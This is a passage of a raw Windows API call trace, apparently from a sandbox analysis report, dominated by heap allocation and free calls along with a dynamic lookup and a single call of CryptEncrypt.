wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0244.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0244.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0244.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0244.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x34aa7a8 [0244.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa7a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.505] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3cb8 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0244.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0244.506] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0244.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0244.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0244.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0244.511] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0244.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0244.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0244.512] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 